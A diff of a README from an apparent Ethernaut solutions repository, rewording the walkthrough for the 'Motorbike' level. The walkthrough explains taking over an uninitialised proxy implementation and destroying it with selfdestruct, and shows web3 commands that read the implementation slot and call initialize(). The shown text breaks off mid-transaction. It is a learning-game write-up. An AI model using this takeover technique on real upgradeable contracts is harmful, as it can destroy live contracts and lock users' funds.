Bauchibred/ethernaut-solutions/README.md

 ## 25. Motorbike

-Nowadays, using a proxy is quite a common pattern but if you don't understand what you are doing, it can lead to very disasterous consequences.
-This level is an example of what happened with [parity wallet](https://www.parity.io/blog/a-postmortem-on-the-parity-multi-sig-library-self-destruct/).
+Using proxies is a pretty common pattern in recent times, but this can lead to very disasterous consequences if one does not understand how to safely engage them.
+This level is an example of what happened witht the parity wallet.

-We want to destroy the Motorbike but within the motorbike contract, there isn't any `selfdestruct` calls.
-Instead of attacking the Motorbike contract, why don't we attack the engine contract?
-Motorbike relies on the engine contract for its logic so if we can destroy the engine contract, the Motorbike is rendered useless.
+Here we want to destroy the Motorbike but within the motorbike contract, there isn't any `selfdestruct` calls.
+So innstead of attacking the Motorbike contract, we can instead attack the engine contract!
+Motorbike relies on the engine contract for its logic so if we can destroy the engine contract, the Motorbike is automatically rendered useless.

-Let's interact directly with the engine contract and gain ownership of it.
-Once we're made the upgrader, we can easily upgrade the engine logic to a malicious contract and call `selfdestruct`.
+We interact directly with the engine contract and gain ownership of it.
+Once we make ourself the upgrader, we can easily upgrade the engine logic to a malicious contract and call `selfdestruct`.

 ```
-// Get the engine contract address
+// We get the engine contract address
 implAddr = await web3.eth.getStorageAt(instance, '0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc')

 implAddr = '0x' + implAddr.slice(26)

-// Call `initialize()` to become the upgrader
+// Now we can call `initialize()` to become the upgrader
 data = web3.eth.abi.encodeFunctionSignature("initialize()")
 await web3.eth.sendTransaction({
     from: player,